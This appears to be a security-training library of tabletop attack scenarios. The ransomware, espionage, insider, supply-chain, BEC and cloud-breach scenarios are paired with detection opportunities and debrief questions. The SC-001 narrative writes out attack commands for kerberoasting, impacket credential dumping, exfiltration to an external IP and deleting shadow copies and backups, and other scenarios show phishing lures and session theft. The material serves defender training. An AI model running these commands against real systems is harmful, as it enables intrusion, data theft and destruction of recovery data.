Attack Scenario Library¶
Scenario-Based Learning
Tabletop exercises and purple team scenarios are the highest-fidelity learning activity in security operations training. Reading about an attack is passive; being the analyst when it unfolds builds the muscle memory, communication habits, and decision frameworks that make defenders effective under pressure.
Each scenario in this library is a self-contained exercise packet: threat actor backstory, phased attack narrative with realistic evidence, discussion inject questions, expected analyst actions, detection gaps, and a structured debrief guide.
How to Use This Library¶
Work through each scenario phase independently. At each Discussion Inject, pause and write down your answers before reading the expected analyst actions. Compare your response to the guidance — gaps reveal knowledge or tooling blind spots worth investigating.
Assign roles before starting: Incident Commander, Lead Analyst, Threat Intel, Communications Lead, and Legal/Compliance Observer. The facilitator reads each phase aloud and presents the inject questions. The team deliberates; the facilitator captures decisions and challenges assumptions where warranted. Run the debrief guide at the end.
Red team executes the attack narrative against the real environment (or a lab clone). Blue team defends without advance knowledge of the scenario. After each phase, pause for a structured sync: did detection fire? Was the evidence interpretable? What would have changed the outcome?
Difficulty Rating System¶
Each scenario carries a 1–5 star difficulty rating based on four axes:
| Stars | Detection Complexity | Attack Sophistication | Response Complexity | Who It Is For |
|---|---|---|---|---|
| ★☆☆☆☆ | Noisy, obvious IOCs | Script-kiddie level | Straightforward playbook | SOC Tier 1 new hires |
| ★★☆☆☆ | Moderate; SIEM alerts present | Criminal, opportunistic | Multi-team coordination | Tier 1–2 analysts |
| ★★★☆☆ | Some evasion; mixed signals | Skilled criminal group | Judgment calls required | Tier 2 + detection engineers |
| ★★★★☆ | Significant evasion; partial evidence | Sophisticated eCrime / APT-light | Cross-domain decisions | Senior analysts, architects |
| ★★★★★ | Stealth-first; may never alert | Nation-state APT | Strategic and legal dimensions | Senior IR, CISO, legal |
Tabletop Facilitation Guide¶
Before the Exercise¶
- [ ] Select scenario appropriate to team experience level (use rating above)
- [ ] Assign roles: Incident Commander, Lead Analyst, Threat Intel Analyst, Comms Lead, Legal/Risk Observer
- [ ] Brief participants: "This is a no-fault learning environment. All decisions are valid starting points for discussion."
- [ ] Confirm logistics: whiteboard or shared doc for timeline, action log, and decision capture
- [ ] Set time boundaries per phase (suggested times shown in each scenario header)
- [ ] Designate a scribe to capture decisions and action items
During the Exercise¶
- The facilitator reads each Phase narrative aloud, then presents evidence artifacts
- At each
???+ injectblock, pause — allow 5–10 minutes of team discussion before moving on - The facilitator's job is not to correct the team but to ask probing questions:
- "What tool would you use to verify that?"
- "Who else needs to know about this decision right now?"
- "What's your confidence level, and what would change it?"
- Capture all decisions in the action log — revisit them in debrief
Inject Question Philosophy¶
Discussion injects are marked with ???+ inject "Phase N — Inject" admonition blocks. They are categorized by type:
| Inject Type | Icon | Purpose |
|---|---|---|
| Technical | Analyst tool and technique knowledge | |
| Decision | Judgment calls under uncertainty | |
| Communication | Stakeholder and escalation decisions | |
| Legal/Compliance | Regulatory, notification, or legal obligations |
Post-Exercise Debrief Guide¶
Run immediately after the exercise (within 30 minutes, while context is fresh).
Hot Debrief (15 minutes — all participants)¶
- What went well? — name two things the team did effectively
- Where did we hesitate? — identify the moments of uncertainty and why
- What surprised us? — evidence or attacker behavior that was unexpected
- What single control, if in place, would have changed the outcome most?
Deep Debrief (45–60 minutes — leads only)¶
- Walk the kill chain against your actual control coverage — where are the real gaps?
- Review each decision point: was the right person in the room? Did they have the right data?
- Map detected vs. missed attacker actions to your SIEM use case library
- Identify 3 concrete action items with owners and due dates — add to the risk register
- Schedule a follow-up exercise in 90 days to test whether gaps were closed
Scenario Index¶
Quick Reference Grid¶
| ID | Scenario | Type | Difficulty | Duration | Threat Actor |
|---|---|---|---|---|---|
| SC-001 | Enterprise Ransomware — Full Kill Chain | Ransomware | ★★★★☆ | 4h | RaaS Affiliate |
| SC-002 | APT Espionage Campaign | APT | ★★★★★ | 3h+ | Nation-State |
| SC-003 | Insider Data Theft — Departing Employee | Insider | ★★★☆☆ | 2h | Malicious Insider |
| SC-004 | Software Supply Chain Attack | Supply Chain | ★★★★★ | 4h | Nation-State |
| SC-005 | Business Email Compromise — Wire Fraud | BEC/Fraud | ★★★☆☆ | 2h | eCrime Group |
| SC-006 | Cloud Misconfiguration to Data Breach | Cloud | ★★☆☆☆ | 2h | Opportunistic |
| SC-007 | Healthcare Ransomware — Patient Safety | Ransomware/OT | ★★★★☆ | 3h | RaaS Affiliate |
| SC-008 | OT/ICS Sabotage — Power Grid | OT/ICS | ★★★★★ | 4–6h | Nation-State |
| SC-009 | Cloud Account Takeover → Data Exfiltration | Cloud | ★★★★☆ | 2–3h | eCrime Group |
| SC-010 | Nation-State APT — Long-Term Espionage | APT | ★★★★★ | 4–6h | Nation-State |
| SC-011 | OT/ICS Ransomware — Manufacturing | OT/ICS | ★★★★☆ | 3–4h | RaaS Affiliate |
| SC-012 | AI System Security — LLM Prompt Injection | AI Security | ★★★☆☆ | 2h | eCrime / Insider |
| SC-013 | AI Model Poisoning | AI Security | ★★★★☆ | 2–3h | Nation-State |
| SC-014 | OT Ransomware — Energy Sector | OT/ICS | ★★★★☆ | 3–4h | RaaS Affiliate |
| SC-015 | Business Email Compromise Deep Dive | BEC/Fraud | ★★★☆☆ | 2h | eCrime Group |
| SC-016 | Kubernetes Compromise | Cloud | ★★★★★ | 3–4h | eCrime Group |
| SC-017 | Insider Threat Data Exfiltration | Insider | ★★★★☆ | 2–3h | Malicious Insider |
| SC-018 | Mobile Device Compromise | Mobile | ★★★☆☆ | 2h | eCrime Group |
| SC-019 | Deepfake Social Engineering | Social Engineering | ★★★★☆ | 2–3h | eCrime Group |
| SC-020 | Critical Infrastructure — Energy | OT/ICS | ★★★★★ | 4–6h | Nation-State |
| SC-021 | AI Model Supply Chain Attack | AI/ML Supply Chain | ★★★★★ | 3–4h | Nation-State |
| SC-022 | Enterprise LLM Jailbreak & Data Exfil | AI/ML Exploitation | ★★★★☆ | 2–3h | eCrime Group |
| SC-023 | RAG Poisoning & Knowledge Base Compromise | AI/ML Data Integrity | ★★★★★ | 3–4h | Insider Threat |
| SC-024 | Deepfake Authentication Bypass | AI-Enabled Identity | ★★★★★ | 3–4h | eCrime Group |
| SC-025 | Software Supply Chain Compromise | Supply Chain | ★★★★★ | 3–4h | Nation-State |
| SC-026 | Zero-Day Exploitation Campaign | Vulnerability Exploitation | ★★★★★ | 4–6h | Nation-State |
| SC-027 | Cloud Cryptomining Infrastructure Abuse | Cloud / Impact | ★★★★☆ | 2–3h | eCrime Group |
| SC-028 | API Abuse Leading to Mass Data Exfiltration | Application Security | ★★★★☆ | 2–3h | eCrime Group |
| SC-029 | Firmware Backdoor: Operation Silicon Ghost | IoT/OT / Supply Chain | ★★★★★ | 4–6h | Nation-State |
| SC-030 | DNS Hijacking: Operation Name Storm | Network / Credential Access | ★★★★★ | 3–4h | eCrime Syndicate |
| SC-031 | OAuth Token Abuse: Operation Consent Trap | Identity / Cloud | ★★★★☆ | 2–3h | Espionage Group |
| SC-032 | Wireless Attack: Operation Air Bridge | Network / Physical | ★★★★☆ | 2–3h | Red Team |
Scenario Cards¶
-
SC-001 · Enterprise Ransomware — Full Kill Chain
Type: Ransomware | Difficulty: ★★★★☆
Duration: 4 hours compressed | Participants: 4–8
Actors: RaaS affiliate (LockBit 3.0-style) — financially motivated
TTPs: HTML smuggling · Cobalt Strike · BloodHound/SharpHound · Kerberoasting · DCSync · Double extortion
-
SC-002 · APT Espionage Campaign
Type: APT | Difficulty: ★★★★★
Duration: 3 hours+ | Participants: 5–8
Actors: Nation-state (APT29-style, Russian SVR) — espionage
TTPs: Malicious macro · WellMess C2 · OneDrive exfil · Pass-the-Ticket · Long dwell time
-
SC-003 · Insider Data Theft
Type: Insider | Difficulty: ★★★☆☆
Duration: 2 hours | Participants: 3–6
Actors: Departing senior data scientist — financially motivated
TTPs: Abnormal file access (UEBA) · DLP bypass · USB exfil · Residual SaaS access
-
SC-004 · Software Supply Chain Attack
Type: Supply Chain | Difficulty: ★★★★★
Duration: 4 hours | Participants: 5–10
Actors: Nation-state — SolarWinds methodology
TTPs: CI/CD implant · Trojanized update · Stage 2 selective targeting · Living-off-the-land
-
SC-005 · Business Email Compromise
Type: BEC/Fraud | Difficulty: ★★★☆☆
Duration: 2 hours | Participants: 3–6
Actors: West African eCrime group — wire fraud
TTPs: AiTM phishing · Session cookie theft · CEO impersonation · DMARC abuse · $1.8M wire fraud
-
SC-006 · Cloud Misconfiguration Breach
Type: Cloud | Difficulty: ★★☆☆☆
Duration: 2 hours | Participants: 3–5
Actors: Opportunistic criminal — automated scanning
TTPs: Public S3 bucket · No access logging · 450K PII records · GDPR 72h notification clock
-
SC-007 · Healthcare Ransomware
Type: Ransomware · Healthcare | Difficulty: ★★★★☆
Duration: 3 hours | Participants: 5–10
Actors: ALPHV/BlackCat affiliate — double extortion
TTPs: IAB-purchased RDP · ADCS ESC1 · Epic EHR encrypted · Patient safety incidents · HIPAA breach
-
SC-008 · OT/ICS Sabotage — Power Grid
Type: OT/ICS | Difficulty: ★★★★★
Duration: 4–6 hours | Participants: 6–12
Actors: Nation-state (Sandworm/ELECTRUM-style)
TTPs: CRASHOVERRIDE methodology · IEC 61850/104 modules · SIS DoS · NERC CIP violations · 230K customers impacted
-
SC-009 · Cloud Account Takeover → Data Exfiltration
Type: Cloud | Difficulty: ★★★★☆
Duration: 2–3 hours | Participants: 4–8
Actors: eCrime group (financially motivated)
TTPs: O365 credential phishing · OAuth token theft · Mail forwarding · BEC invoice fraud · AWS SSRF · S3 mass download (100 GB)
-
SC-010 · Nation-State APT — Long-Term Espionage
Type: APT | Difficulty: ★★★★★
Duration: 4–6 hours or multi-session | Participants: 5–10
Actors: APT-X (fictional, East Asia origin) — defense contractor targeting
TTPs: Zero-day PDF · Custom implant · LOTL AD enumeration · Slow-drip exfil (100 MB/week) · 6-month dwell time
-
SC-011 · OT/ICS Ransomware — Manufacturing
Type: OT/ICS | Difficulty: ★★★★☆
Duration: 3–4 hours | Participants: 5–10
Actors: RaaS affiliate — opportunistic + OT-aware
TTPs: Phishing → Cobalt Strike · IT-to-OT pivot · SCADA historian access · HMI encryption · Safety shutdown decision · ICS-CERT notification
-
SC-012 · AI System Security — LLM Prompt Injection
Type: AI Security | Difficulty: ★★★☆☆
Duration: 2 hours | Participants: 3–8
Actors: eCrime group / insider threat
TTPs: Indirect prompt injection · SOAR manipulation · Knowledge base poisoning · Alert suppression · AI audit trail gaps
-
SC-013 · AI Model Poisoning
Type: AI Security | Difficulty: ★★★★☆
Duration: 2–3 hours | Participants: 4–8
Actors: Nation-state — AI supply chain targeting
TTPs: Training data poisoning · Model backdoor · Adversarial ML · Drift detection evasion
-
SC-014 · OT Ransomware — Energy Sector
Type: OT/ICS | Difficulty: ★★★★☆
Duration: 3–4 hours | Participants: 4–8
Actors: RaaS affiliate — OT-aware variant
TTPs: IT-OT pivot · SCADA targeting · Safety system impact · Energy sector disruption
-
SC-015 · Business Email Compromise Deep Dive
Type: BEC/Fraud | Difficulty: ★★★☆☆
Duration: 2 hours | Participants: 3–6
Actors: eCrime group — financially motivated
TTPs: AiTM phishing · Token theft · Wire fraud · Business process manipulation
-
SC-016 · Kubernetes Compromise
Type: Cloud | Difficulty: ★★★★★
Duration: 3–4 hours | Participants: 4–8
Actors: eCrime group — container exploitation specialist
TTPs: Container escape · RBAC abuse · Secrets theft · Lateral movement · Cryptomining
-
SC-017 · Insider Threat Data Exfiltration
Type: Insider | Difficulty: ★★★★☆
Duration: 2–3 hours | Participants: 4–6
Actors: Malicious insider — departing employee
TTPs: Privileged access abuse · Data staging · Cloud exfil · DLP evasion
-
SC-018 · Mobile Device Compromise
Type: Mobile | Difficulty: ★★★☆☆
Duration: 2 hours | Participants: 3–6
Actors: eCrime group — mobile exploitation
TTPs: Malicious app · MDM bypass · Credential harvesting · SMS interception
-
SC-019 · Deepfake Social Engineering
Type: Social Engineering | Difficulty: ★★★★☆
Duration: 2–3 hours | Participants: 4–8
Actors: eCrime group — deepfake specialist
TTPs: Voice deepfake · Video manipulation · Executive impersonation · Wire fraud
-
SC-020 · Critical Infrastructure — Energy
Type: OT/ICS | Difficulty: ★★★★★
Duration: 4–6 hours | Participants: 5–10
Actors: Nation-state — critical infrastructure targeting
TTPs: Supply chain compromise · SCADA exploitation · Safety system targeting · Grid disruption
-
SC-021 · AI Model Supply Chain Attack
Type: AI/ML Supply Chain | Difficulty: ★★★★★
Duration: 3–4 hours | Participants: 4–8
Actors: Nation-state — AI supply chain specialist
TTPs: Backdoored model · Poisoned weights · ML pipeline compromise · Model registry tampering
-
SC-022 · Enterprise LLM Jailbreak
Type: AI/ML Exploitation | Difficulty: ★★★★☆
Duration: 2–3 hours | Participants: 4–8
Actors: eCrime group — LLM exploitation specialist
TTPs: Prompt injection · Jailbreaking · Data exfil via inference API · System prompt leaking
-
SC-023 · RAG Poisoning Attack
Type: AI/ML Data Integrity | Difficulty: ★★★★★
Duration: 3–4 hours | Participants: 4–8
Actors: Insider threat — knowledge base write access
TTPs: Vector DB poisoning · Document injection · Retrieval hijacking · Embedding manipulation
-
SC-024 · Deepfake Authentication Bypass
Type: AI-Enabled Identity | Difficulty: ★★★★★
Duration: 3–4 hours | Participants: 4–8
Actors: eCrime group — synthetic identity specialist
TTPs: Face deepfake · Voice cloning · Biometric bypass · KYC fraud · Liveness detection evasion
-
SC-025 · Software Supply Chain Compromise
Type: Supply Chain | Difficulty: ★★★★★
Duration: 3–4 hours | Participants: 4–8
Actors: PHANTOM FORGE — nation-state supply chain operators
TTPs: CI/CD poisoning · Dependency confusion · Code signing bypass · Backdoored artifacts
-
SC-026 · Zero-Day Exploitation Campaign
Type: Vulnerability Exploitation | Difficulty: ★★★★★
Duration: 4–6 hours | Participants: 4–8
Actors: IRON LOTUS — nation-state APT targeting defense sector
TTPs: Edge appliance zero-day · Lateral movement · Data staging · Behavioral detection evasion
-
SC-027 · Cloud Cryptomining Infrastructure Abuse
Type: Cloud / Impact | Difficulty: ★★★★☆
Duration: 2–3 hours | Participants: 3–6
Actors: COIN SHADOW — financially motivated cloud abuse group
TTPs: Credential theft · Mass GPU provisioning · Cryptomining · Billing anomaly evasion
-
SC-028 · API Abuse Leading to Mass Data Exfiltration
Type: Application Security | Difficulty: ★★★★☆
Duration: 2–3 hours | Participants: 3–6
Actors: DATA WRAITH — data broker with automated scraping tools
TTPs: BOLA exploitation · API scraping · GraphQL introspection · Rate limit bypass
Full scenario n- SC-029 · Firmware Backdoor: Operation Silicon Ghost
Type: IoT/OT Supply Chain | Difficulty: ★★★★★
Duration: 4–6 hours | Participants: 4–8
Actors: CIRCUIT PHANTOM — nation-state targeting industrial control systems
TTPs: Firmware reverse engineering · Backdoor implant · DNS-over-HTTPS C2 · Industrial sabotage
-
SC-030 · DNS Hijacking: Operation Name Storm
Type: Network | Difficulty: ★★★★★
Duration: 3–4 hours | Participants: 3–6
Actors: SHADOW RESOLVER — cybercrime syndicate targeting financial services
TTPs: Registrar compromise · DNS record manipulation · Certificate fraud · MitM
-
SC-031 · OAuth Token Abuse: Operation Consent Trap
Type: Identity/Cloud | Difficulty: ★★★★☆
Duration: 2–3 hours | Participants: 3–6
Actors: VELVET HOOK — espionage group targeting professional services
TTPs: OAuth consent phishing · Token harvesting · Mailbox access · Refresh token persistence
-
SC-032 · Wireless Attack: Operation Air Bridge
Type: Network/Physical | Difficulty: ★★★★☆
Duration: 2–3 hours | Participants: 3–6
Actors: RADIO FALCON — red team simulation / insider threat
TTPs: Evil twin AP · RADIUS credential capture · WPA2-Enterprise abuse · Lateral movement
SC-001: Enterprise Ransomware — Full Kill Chain¶
Duration: Multi-week exercise (or 4-hour compressed tabletop) Threat Actor Profile: LockBit 3.0-style RaaS affiliate Initial Access: Phishing email with ISO attachment (HTML smuggling) Objective: Full domain encryption + double extortion
Phase 1: Initial Access¶
DAY 0:
─────────────────────────────────────────────────────────
Attacker sends spearphishing email to finance department:
From: payroll-notifications@payr0ll-service.com (lookalike domain)
To: accounts.payable@targetcorp.com
Subject: ACTION REQUIRED: ADP Payroll Update - Direct Deposit Changes
"Dear Team,
ADP has updated our security policy requiring re-enrollment for direct
deposit. Please review and confirm your banking information by Friday.
[Open Secure Document]"
→ HTML attachment uses HTML smuggling to drop ISO file
→ ISO contains LNK shortcut + DLL
→ LNK executes: cmd /c start /b rundll32.exe update.dll,Install
→ DLL loads Cobalt Strike beacon
→ Beacon: HTTPS to compromised CDN (domain fronting via Cloudflare)
→ 45-second sleep + 15% jitter
ATT&CK Techniques: - T1566.001: Spearphishing Attachment - T1027.006: HTML Smuggling - T1218.011: Rundll32 - T1071.001: Web Protocols (HTTPS C2)
Detection Opportunities: - Email gateway: HTML attachment + ISO URL pattern - EDR: rundll32.exe spawning from ISO-mounted directory - DNS: Domain age check on lookalike domain (0–30 days) - Network: HTTPS connection to domain-fronted CDN from unusual process
Phase 2: Foothold and Discovery (Days 1-3)¶
DAY 1-3:
─────────────────────────────────────────────────────────
Beacon active on finance workstation:
→ whoami /all (T1033)
→ net user /domain (T1087.002)
→ systeminfo (T1082)
→ ipconfig /all (T1016)
→ net view /all (T1135)
Deploy SharpHound data collector:
→ Upload via Cobalt Strike: upload SharpHound.exe C:\Windows\Temp\svchost32.exe
→ Execute: execute-assembly SharpHound.exe -c All --ZipFileName data.zip
→ Download results to analyst
BloodHound analysis reveals:
→ Finance workstation user is member of Finance_Managers group
→ Finance_Managers has WriteDacl on HR_System$ share
→ HR_System$ server is domain joined
→ Domain backup operator account has logon rights to backup server
→ Backup server can DCSync (misconfigured)
Attacker selects path: Finance → Kerberoast service account → pivot to backup server → DCSync
ATT&CK Techniques: - T1069.002: Domain Groups - T1087.002: Domain Account enumeration - T1482: Domain Trust Discovery
Detection Opportunities: - SIEM: Multiple AD enumeration commands in rapid succession - EDR: SharpHound binary execution (hash or behavior signature) - AD: LDAP queries with unusual filters (BloodHound pattern)
Phase 3: Privilege Escalation (Day 4-5)¶
DAY 4-5:
─────────────────────────────────────────────────────────
Kerberoasting against SVC_Backup account (SPN: backup/backupserver.corp.local):
→ Rubeus kerberoast /format:hashcat → SVC_Backup TGS hash extracted
→ Hashcat cracking: rules attack on rockyou.txt + company wordlist
→ Password cracked: "Backup2022!" (in 4 hours with GPU cluster)
Lateral movement to backup server:
→ Impacket wmiexec.py CORP/SVC_Backup:Backup2022!@10.0.1.45
→ Shell on backup server
→ Enumerate: Does SVC_Backup have DS-Replication rights?
→ BloodHound confirms: YES
DCSync attack:
→ impacket secretsdump.py CORP/SVC_Backup:Backup2022!@10.0.1.10 -just-dc-ntlm
→ All domain account hashes extracted including krbtgt
→ Administrator: aad3b435b51404eeaad3b435b51404ee:32196B56FFE6F45E294117B4D972F8B2
→ krbtgt: aad3b435b51404eeaad3b435b51404ee:e6d31a1d9e3c4d1b5f8e72f4a2c6e8b9
Detection Opportunities: - SIEM: Event 4769 RC4 TGS for SVC_Backup account - AD: DS-Replication request from non-DC IP - Network: Impacket tool signatures in SMB traffic
Phase 4: Exfiltration (Day 5-6)¶
DAY 5-6:
─────────────────────────────────────────────────────────
Identify high-value data:
→ File share enumeration: find shares containing M&A, contracts, customer data
→ Target: \\fileserver\FinanceDocs\, \\fileserver\LegalContracts\
Data staging and exfiltration:
→ xcopy \\fileserver\FinanceDocs C:\Windows\Temp\stage\ /S
→ 7za.exe a -p"Archive2024!" -mx1 C:\Windows\Temp\data.7z C:\Windows\Temp\stage\
→ StealBit: HTTP POST to 185.220.x.x:8443 (TOR exit node)
→ Total: 47 GB exfiltrated over 6 hours
Confirm exfil success, notify group
Detection Opportunities: - DLP: Large copy from file server to workstation - Network: Large HTTPS upload to unknown external IP - EDR: 7za.exe compression of large data volume
Phase 5: Ransomware Deployment (Day 7)¶
DAY 7 — 03:00 AM (deliberate timing):
─────────────────────────────────────────────────────────
Pre-deployment cleanup:
→ vssadmin delete shadows /all /quiet (T1490)
→ bcdedit /set {default} recoveryenabled No
→ wbadmin delete catalog -quiet
→ net stop "Windows Defender Antivirus Service" (T1562.001)
→ sc disable WinDefend
Mass lateral movement (T1570):
→ PsExec deployed to 200+ hosts simultaneously via GPO (T1072)
→ ADMIN$ share used for distribution
Encryption begins:
→ LockBit locker binary runs on all hosts simultaneously
→ .lockbit3 extension added to all files
→ Ransom note !!-README-RESTORE-FILES-!!.txt in every directory
→ Complete encryption: ~45 minutes (2,300 endpoints)
→ Desktop wallpaper changed: "YOUR NETWORK HAS BEEN ENCRYPTED"
Evidence: Data leak site shows 47GB stolen
Ransom demand: $4.7M in Monero (0.1% of annual revenue)
Deadline: 72 hours
Defender Discussion Points¶
- At which phase could detection have occurred?
- What controls, if operational, would have interrupted this chain?
- How do you respond when 2,300 endpoints are simultaneously encrypted?
- Do you pay? Who decides? What's the legal process?
- How do you communicate to 800 employees who can't access their computers?
- What does recovery look like? Timeline? Resources needed?
SC-002: APT Espionage Campaign¶
Scenario Overview¶
Duration: 3-month simulated engagement Threat Actor: APT29 / Cozy Bear (Russian SVR) Target: Defense contractor with classified government contracts Objective: Steal proprietary technology / defense project plans
Key TTPs¶
| Phase | Technique | ATT&CK ID |
|---|---|---|
| Initial Access | Spearphishing with COVID research lure | T1566.002 |
| Execution | Malicious macro in DOCM | T1204.002 |
| Persistence | Scheduled task disguised as system task | T1053.005 |
| Defense Evasion | WellMess C2 over HTTPS to OneDrive | T1567.002 |
| Discovery | SharePoint search for classified docs | T1213 |
| Collection | Automated ZIP archive of project folders | T1074 |
| Exfiltration | Staged via OneDrive "collaboration" account | T1567.002 |
| Lateral Movement | Pass-the-Ticket to email server | T1550.003 |
Detection Challenges¶
APT29's unique OPSEC makes detection extremely difficult: - Uses only legitimate cloud services as C2 (no custom domains) - Blends into normal O365 activity - Long dwell time (months) before objective - No ransomware or destructive payload (purely espionage) - Minimal lateral movement — targeted access to specific systems
Discussion Questions¶
- How do you detect legitimate cloud service abuse as C2?
- What behavioral anomalies would distinguish APT29 from a legitimate user?
- How do you prove attribution — or does it matter for IR?
- What obligations exist for government contractor breach notification?
- How does this incident change your cloud and email security architecture?
SC-003: Insider Threat — Departing Employee¶
Scenario Overview¶
Actor: Senior data scientist, recently passed over for promotion, received competing job offer Timeline: 6 weeks before departure (notice period) Data at Risk: ML model source code, customer dataset (2M records), API documentation
Behavioral Timeline¶
WEEK 1: Job offer accepted
├── LinkedIn updated with "Open to Work" (HR notices via social monitoring)
├── Resignation submitted — works 2-week notice
└── Access not immediately revoked (IT ticket backlog)
WEEK 2-3: Active staging
├── UEBA alert: file access volume 8x baseline (Monday 11 PM - 2 AM)
├── DLP alert: 47 archives uploaded to personal Dropbox account
├── Email: Forwarded project documentation to personal Gmail
└── USB: 128GB drive inserted to workstation (logged by Sysmon)
WEEK 4-6: Post-departure exploitation
├── Forgot to revoke SaaS access: GitHub private repo still accessible
├── Used personal device (not managed) to clone company repos
└── Joined competitor: company IP appears in competitor product 6 months later
Discussion Questions¶
- HR-to-security communication process — what triggered (or should have triggered) security monitoring?
- Legal constraints on monitoring a resigning employee vs. a regular employee
- At what point do you take forensic action? Confront? Involve legal?
- What did the organization's DLP, UEBA, and endpoint monitoring reveal?
- Evidence chain for potential civil/criminal action
SC-004: Software Supply Chain Attack¶
Based loosely on SolarWinds methodology
Attack Chain¶
STEP 1: Target identified
└── Attacker researches "target.com uses Orion-equivalent software" via LinkedIn/job posts
STEP 2: Vendor compromise
└── Phishing against DevOps engineer at software vendor
└── Credentials to build server obtained
STEP 3: Build system implant
└── SUNSPOT equivalent injected into CI/CD pipeline
└── Trojanized DLL compiled into next software update
STEP 4: Update distributed
└── 12,000 customers install update
└── Implant activates after 14-day delay
└── Reports environment fingerprint to C2
STEP 5: Target selection
└── High-value targets (government, defense, financial) receive stage 2
└── Others: implant remains dormant
STEP 6: Long-term espionage
└── Using legitimate cloud services as C2
└── 6-9 month dwell time before discovery
Discussion Questions¶
- How do you detect malicious code in a trusted vendor update?
- What contractual and technical controls would have prevented this?
- SBOM (Software Bill of Materials) — how does it help? Is it sufficient?
- How do you communicate to customers that you were the attack vector?
- SLSA framework — would Level 3 have prevented this attack?
SC-005: Business Email Compromise — Wire Fraud¶
Duration: 3-week simulated campaign (or 2-hour tabletop) Threat Actor: West African cybercriminal group (BEC-specialized) Target: Mid-market manufacturing company ($200M revenue) Objective: Fraudulent wire transfer of $1.8M to attacker-controlled account Outcome (simulated): Transfer initiated; $1.2M recovered via FBI IC3 recall; $600K lost
Attack Narrative¶
DAY 1 — RECONNAISSANCE
────────────────────────────────────────────────────────────────
Attacker harvests from LinkedIn and company website:
- CFO name: Sarah Mitchell (sarah.mitchell@target.com)
- CEO name: Robert Chen (robert.chen@target.com)
- External counsel: Baker & Greene LLP (listed in SEC filings)
- Ongoing M&A activity: press release reveals acquisition talks
DAY 3 — DOMAIN REGISTRATION
────────────────────────────────────────────────────────────────
Attacker registers: target-corp.com (lookalike — hyphen added)
Configures: robert.chen@target-corp.com
SPF record added to appear legitimate
No DMARC policy at target.com — no alignment check possible
DAY 5 — THREAD HIJACKING (AiTM variant)
────────────────────────────────────────────────────────────────
Phishing email to sarah.mitchell@target.com:
Subject: "Secure document review — acquisition NDA"
Link → Evilginx2 reverse proxy → Microsoft 365 login (real)
Victim authenticates → session cookie captured
Attacker logs into M365 as Sarah — MFA bypassed via session theft
Attacker reads last 30 days of CFO email threads
Key finding: pending $1.8M payment to vendor "Apex Solutions"
DAY 8 — BEC EXECUTION
────────────────────────────────────────────────────────────────
From: robert.chen@target-corp.com (spoofed CEO lookalike)
To: sarah.mitchell@target.com
Subject: Re: Apex Solutions payment — URGENT change
"Sarah, Apex has notified us of a bank account change effective today.
Please update the wire instructions for the $1.8M payment:
Bank: City National Bank
Account: 4471829037
Routing: 122016066
Reference: APX-2026-Q1-FINAL
This must go today — our counsel says delay triggers penalty clauses.
Do not discuss via phone — I am in board meetings all day. — Robert"
DAY 8 +4 HOURS:
────────────────────────────────────────────────────────────────
CFO initiates wire transfer per "CEO" instruction
Finance controller approves (second approver also deceived)
$1.8M transferred to attacker-controlled account
Attacker immediately moves $1.2M to crypto (Monero)
Remaining $600K sits in mule account
DAY 9 — DISCOVERY
────────────────────────────────────────────────────────────────
Real CEO asks about Apex payment status
CFO realizes CEO never sent the email
Incident declared — FBI IC3 contacted within 4 hours
Financial Institution Fraud Unit freezes $600K in mule account
$1.2M already converted — unrecoverable
ATT&CK Mapping¶
| Phase | Technique | ID |
|---|---|---|
| Reconnaissance | Gather Victim Org Info | T1591 |
| Resource Development | Acquire Infrastructure: Domain | T1583.001 |
| Initial Access | Phishing: Spearphishing Link (AiTM) | T1566.002 |
| Credential Access | Steal Web Session Cookie | T1539 |
| Collection | Email Collection | T1114 |
| Impact | Transfer Financial Assets (BEC) | T1657 |
Detection Opportunities¶
| Control | Would Have Caught | Cost |
|---|---|---|
DMARC p=reject on target.com | Lookalike domain blocked at delivery | Low |
| MFA-resistant auth (FIDO2) | AiTM session theft fails | Medium |
| Conditional Access: token binding | Session cookie theft fails | Medium |
| Dual-approval + callback for wire changes | Transfer requires voice confirm | Low (policy) |
| Anti-phishing AI (Defender for O365 P2) | Lookalike domain flagged | Medium |
| UEBA: email access from new IP/ASN | Session hijack detected | Medium |
Discussion Questions¶
- DMARC was not configured — who in the org is responsible for email authentication?
- The CFO had MFA — how did AiTM bypass it? What authentication would have prevented it?
- At what point in the attack chain could a dual-approval policy have stopped the transfer?
- Regulatory obligations: SAR filing? Customer notification? What are the time limits?
- How do you structure the post-incident conversation with the CFO without creating blame?
SC-006: Cloud Misconfiguration to Data Breach¶
Duration: 2-week simulated breach (or 2-hour tabletop) Threat Actor: Opportunistic criminal; automated scanner Target: SaaS startup — AWS-hosted; 450K customers Initial Vector: Public S3 bucket discovered via automated scanning Outcome: 450K customer PII records exfiltrated; GDPR breach notification required
Attack Narrative¶
AUTOMATED DISCOVERY PHASE (no human involvement)
────────────────────────────────────────────────────────────────
GrayhatWarfare / S3Scanner bot scans for public S3 buckets:
s3://startup-prod-backups/ — PUBLIC READ (misconfigured)
Contents: nightly database backup files (.sql.gz)
Largest file: backup-2026-03-01.sql.gz (4.2GB)
No authentication required — direct download via HTTP
$ aws s3 cp s3://startup-prod-backups/backup-2026-03-01.sql.gz . --no-sign-request
HUMAN ATTACKER TAKES OVER
────────────────────────────────────────────────────────────────
Download completes in 8 minutes (no rate limiting, no VPC endpoint)
Database contains:
- 450,000 customer records (name, email, address, phone)
- 12,000 records with partial payment card data (last4, exp)
- Password hashes: bcrypt (most), MD5 (legacy users from 2019)
Attacker posts sample on hacker forum — offers full DB for $15,000
HaveIBeenPwned researcher notifies company 3 days after initial access
CloudTrail shows no alerts — S3 server access logging was disabled
DISCOVERY BY COMPANY
────────────────────────────────────────────────────────────────
Notification from HIBP researcher
Security team reviews CloudTrail:
- GetObject API calls from 45.x.x.x (VPN exit, Netherlands)
- No alert fired: S3 bucket was not in Macie scope
- No GuardDuty finding: bucket listed as "internal backup" in tag
- First access: 96 hours ago — dwell time exceeded detection window
GDPR Breach Response Timeline¶
gantt
dateFormat YYYY-MM-DD HH:mm
axisFormat %H:%M Day %j
section Discovery
HIBP notification received :milestone, d1, 2026-03-05 09:00, 0m
Incident declared :d2, 2026-03-05 09:00, 2h
section Assessment
Scope confirmed (450K PII) :d3, 2026-03-05 11:00, 4h
Legal counsel engaged :d4, 2026-03-05 12:00, 2h
section Notification (GDPR: 72h limit)
GDPR 72h deadline :crit, milestone, d5, 2026-03-08 09:00, 0m
DPA notification filed :d6, 2026-03-07 18:00, 2h
section Remediation
S3 bucket made private :d7, 2026-03-05 10:00, 1h
Macie enabled on all buckets:d8, 2026-03-06 09:00, 4h
Customer notification sent :d9, 2026-03-10 09:00, 1hRoot Cause Analysis¶
| Finding | Root Cause | Fix |
|---|---|---|
